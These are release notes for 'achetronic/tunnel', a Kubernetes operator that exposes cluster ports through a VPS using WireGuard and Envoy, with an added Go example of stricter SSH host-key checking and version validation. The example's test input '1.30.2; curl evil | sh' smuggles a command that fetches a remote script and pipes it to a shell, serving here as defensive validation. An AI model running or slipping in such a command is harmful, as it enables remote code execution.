Releases: achetronic/tunnel

v0.5.0

@achetronic achetronic released this 24 Jun 17:57
701a60f

Host-level performance tuning for the VPS data path.

Breaking changes

  • The boot service was renamed from wg-relay.service to tunnel-boot.service, because it now reapplies the whole node configuration on boot, not just WireGuard. The WireGuard interface is still named wg-relay.

Features

  • New spec.host block for tuning the VPS kernel and NIC, kept separate from the Envoy proxy config:
    • kernelMaxSocketBufferBytes (default 25MB): raises the kernel socket buffer ceiling (the net.core.rmem_max/wmem_max sysctls on Linux) and sets SO_RCVBUF/SO_SNDBUF on the UDP listeners. UDP needs this set explicitly, because the kernel only autotunes TCP buffers; a UDP socket keeps the default size unless asked.
    • disableNicOffloads (default false): turns GRO/GSO off on the underlay NIC. Use it for encapsulated UDP (tunnel-in-tunnel), where receive coalescing can corrupt datagram boundaries. The interface is detected automatically.
  • enable_reuse_port is set on all Envoy listeners so the kernel spreads incoming connections and datagrams across Envoy's worker threads.

Changes

  • Removed prefer_gro from the Envoy UDP listeners; GRO is now left to the OS, or switched off at the NIC via disableNicOffloads.
  • NIC offloads are toggled natively on the VPS, without shelling out to the ethtool binary, the same way WireGuard and nftables are programmed.
  • New dependency: github.com/safchain/ethtool (Apache-2.0), a Go library that issues the ethtool ioctls directly.

v0.4.0

@achetronic achetronic released this 23 Jun 20:52

Features

  • UDP GRO (Generic Receive Offload) is enabled on the downstream socket of every UDP listener via prefer_gro: true in udp_listener_config. (Removed again in v0.5.0, which leaves GRO to the OS or the NIC setting.)

v0.3.1

@achetronic achetronic released this 15 Jun 21:03

Moves the operator's internal ports out of the way of your traffic.

Changed

  • The uplink readiness/health endpoint moved from port 8080 to 40500, and the Envoy edge admin/metrics port moved from 9901 to 40600. Both were commonly used ports that could clash with a port you expose through a PortBinding; the new ones sit in a high range where a collision is far less likely. Both ports are reserved by the data path, so a PortBinding must not use them.

Upgrade note

The ports are hardcoded in this release. Existing EdgeNodes re-enroll cleanly and the uplink pods roll over to the new readiness port on their own; there is no manual step beyond upgrading the chart and letting the operator reconcile.

v0.3.0

@achetronic achetronic released this 15 Jun 19:23

If you ran an earlier version, this one is much steadier under failure: reboots, restarts, scale-downs and bad input no longer leave things wedged.

Added

  • PortBinding readiness is now accurate: Ready only becomes true once the binding is actually live on the edge, not merely queued.
  • New --leader-elect-namespace flag, so you can run the manager outside the cluster (for example with make run).
  • spec.uplink.namespace is now immutable, so it can no longer be changed in a way that strands resources in the old namespace.

Fixed: control plane

  • The EdgeNode no longer reconciles itself in a loop, so it stops hammering the VPS over SSH.
  • Applied bindings are recorded as soon as enrollment succeeds, so a later hiccup can't leave a binding stuck as "not applied".
  • The manager skips status writes when nothing changed.
  • Uplink resources owned by another EdgeNode are left alone instead of being deleted.
  • Reconcile concurrency is bounded, and inputs are checked more strictly.

Fixed: data path (VPS)

  • A healthy uplink no longer gets dropped by its own health check. Each check now uses a fresh connection, which fixes spurious failures that could reset live traffic.
  • The generated Envoy config is now valid in all cases (proxy-protocol health checks, durations, TLS passthrough).
  • The tunnel survives a VPS reboot: WireGuard comes back before Envoy starts.
  • The uplink drains cleanly on shutdown, so rolling updates don't drop in-flight connections.
  • An uplink pod only reports ready once WireGuard and nftables are actually applied and the WireGuard handshake is fresh.
  • The first apply retries on failure instead of leaving a pod stuck not-ready.
  • Stale routes are cleaned up when you scale uplinks down.
  • A dead SSH connection can no longer freeze a worker.
  • The same port number can now be exposed for TCP and UDP at once.
  • VPS state now lives in /etc/tunnel (renamed from /etc/tunnel-operator).

Fixed: security

  • SSH host-key checking now verifies the presented key against the known_hosts entry for the host being dialed, not against any entry in the file. Previously a key recorded for any known host was accepted for every host.
  • The Envoy version is validated before it is interpolated into any shell command.
  • VPS binaries are called by absolute path, so a modified PATH on the VPS cannot substitute a different binary.
  • The Envoy admin address follows your tunnel network, so a custom network no longer breaks enrollment.
  • uplink.replicas is capped, so a huge replica count cannot be used to exhaust the operator with per-replica key generation.
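As an added example that is not the project's code, the Go program below shows two of the fixes above in a minimal implementation: a known_hosts check that only accepts a key recorded for the host being dialed, beside the lax variant it replaces, and a version validator that rejects anything but a plain semantic version before the value can reach a command line. The known_hosts content and key blobs are constructed for the example, and every function name is this example's own; the project's real code may differ.

```go
package main

import (
	"bytes"
	"encoding/base64"
	"errors"
	"fmt"
	"net"
	"regexp"
	"strings"
)

// hostKeyEntry is one line of a plain (non-hashed) OpenSSH known_hosts file:
// a comma-separated host list, a key type and the base64 key blob.
type hostKeyEntry struct {
	hosts   []string
	keyType string
	blob    []byte
}

// parseKnownHosts parses the plain known_hosts format; comments are skipped.
func parseKnownHosts(data string) ([]hostKeyEntry, error) {
	var entries []hostKeyEntry
	for n, line := range strings.Split(data, "\n") {
		line = strings.TrimSpace(line)
		if line == "" || strings.HasPrefix(line, "#") {
			continue
		}
		fields := strings.Fields(line)
		if len(fields) < 3 {
			return nil, fmt.Errorf("known_hosts line %d: expected 'hosts type key'", n+1)
		}
		blob, err := base64.StdEncoding.DecodeString(fields[2])
		if err != nil {
			return nil, fmt.Errorf("known_hosts line %d: bad key blob: %w", n+1, err)
		}
		entries = append(entries, hostKeyEntry{
			hosts:   strings.Split(fields[0], ","),
			keyType: fields[1],
			blob:    blob,
		})
	}
	return entries, nil
}

// knownHostsName is how OpenSSH spells a host:port pair: the bare host for
// port 22, "[host]:port" otherwise. It must be derived from the address we
// dialed, never from anything the remote side claims about itself.
func knownHostsName(addr string) string {
	host, port, err := net.SplitHostPort(addr)
	if err != nil {
		return addr
	}
	if port == "22" {
		return host
	}
	return "[" + host + "]:" + port
}

// laxHostKeyCheck is the bug class described above: it accepts the presented
// key if it appears anywhere in the file, regardless of which host it belongs
// to. Whoever holds the private key of any enrolled VPS can then impersonate
// every other enrolled VPS to the operator.
func laxHostKeyCheck(entries []hostKeyEntry, keyType string, blob []byte) error {
	for _, e := range entries {
		if e.keyType == keyType && bytes.Equal(e.blob, blob) {
			return nil
		}
	}
	return errors.New("host key not in known_hosts")
}

// strictHostKeyCheck requires the key to be recorded for the dialed host and
// distinguishes "unknown host" from "known host, different key" (the MITM case).
func strictHostKeyCheck(entries []hostKeyEntry, addr, keyType string, blob []byte) error {
	want := knownHostsName(addr)
	seenHost := false
	for _, e := range entries {
		for _, h := range e.hosts {
			if h != want {
				continue
			}
			seenHost = true
			if e.keyType == keyType && bytes.Equal(e.blob, blob) {
				return nil
			}
		}
	}
	if seenHost {
		return fmt.Errorf("host key mismatch for %s: possible man-in-the-middle", want)
	}
	return fmt.Errorf("no known_hosts entry for %s", want)
}

// envoyVersionRe accepts only a bare semantic version such as 1.30.2. Shell
// metacharacters, paths and flags are rejected before the string is ever
// placed on a command line.
var envoyVersionRe = regexp.MustCompile(`^v?[0-9]+\.[0-9]+\.[0-9]+$`)

func validateEnvoyVersion(v string) error {
	if !envoyVersionRe.MatchString(v) {
		return fmt.Errorf("invalid envoy version %q", v)
	}
	return nil
}

func main() {
	// Constructed known_hosts: two enrolled VPSes with distinct fake key blobs.
	keyA := []byte("constructed-host-key-A")
	keyB := []byte("constructed-host-key-B")
	kh := "vps-a.example ssh-ed25519 " + base64.StdEncoding.EncodeToString(keyA) + "\n" +
		"[vps-b.example]:2222 ssh-ed25519 " + base64.StdEncoding.EncodeToString(keyB) + "\n"
	entries, _ := parseKnownHosts(kh)
	// An impostor answering for vps-a presents vps-b's (genuinely enrolled) key.
	fmt.Println("lax:    ", laxHostKeyCheck(entries, "ssh-ed25519", keyB))
	fmt.Println("strict: ", strictHostKeyCheck(entries, "vps-a.example:22", "ssh-ed25519", keyB))
	fmt.Println("version:", validateEnvoyVersion("1.30.2; curl evil | sh"))
}
```

The lax check prints no error for the impostor while the strict one reports a key mismatch; with a real SSH client the same rule is what golang.org/x/crypto/ssh/knownhosts enforces when it is handed the dialed address. The version check is deliberately an allow-list: escaping or quoting the string would still let an attacker-controlled value reach the shell.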

Testing

  • Rendered Envoy config is now checked against a real Envoy in CI (make test), catching problems plain text comparisons miss.

Docs

  • Refreshed the guides, the manager flags table in the README, and code comments.

Upgrade note

The VPS state directory was renamed from /etc/tunnel-operator to /etc/tunnel. There's no migration: an already-enrolled VPS simply re-enrolls itself cleanly on the next reconcile.

v0.2.0

@achetronic achetronic released this 11 Jun 21:55
4982f9a

What's new

  • Edge TLS certificates now rotate without downtime. When a certificate is renewed (for example by cert-manager), the operator updates Envoy on the VPS in place, with no dropped connections and no restart. Previously a renewed certificate was copied to the VPS but Envoy kept serving the old one until it expired, which could take a TLS listener down. If you use TLS offload or mutual mode, you no longer need to do anything on renewal.

Fixes

  • PortBindings no longer leak across namespaces. If you had two EdgeNodes with the same name in different namespaces, a PortBinding could be applied to the wrong one. Bindings are now matched by both name and namespace.
  • Private keys are cleaned up when you remove a TLS binding. Deleting a TLS PortBinding (or switching it away from offload/mutual) now removes its certificate and key from the VPS, instead of leaving them on disk until the node is deleted.

Upgrade notes

  • No configuration or CRD changes are required. After upgrading, EdgeNodes reconcile and move existing TLS bindings to the new mechanism automatically. Old certificate files left on the VPS by previous versions are cleaned up on the next reconcile.

v0.1.0

@achetronic achetronic released this 10 Jun 21:38

First release 🚀

Features

  • Two CRDs: EdgeNode (a VPS plus the tunnel) and PortBinding (the ports to expose).
  • Expose TCP and UDP ports, routed to a Kubernetes Service or a raw IP:port.
  • Active-active HA: N uplink replicas, Envoy L4 load-balancing on the VPS with active health checks per replica.
  • TLS at the edge: passthrough (SNI routing), offload (terminate on the VPS), mutual (downstream mTLS).
  • Client source IP preserved with Proxy Protocol.
  • WireGuard and nftables programmed natively by the tunnelctl agent: no wireguard-tools, wg-quick or nft CLI, distroless uplink. The operator is the single SSH writer, verifies the VPS host key, and stays out of the data path.
  • Multi-arch images (amd64/arm64).
  • Helm chart published as an OCI artifact.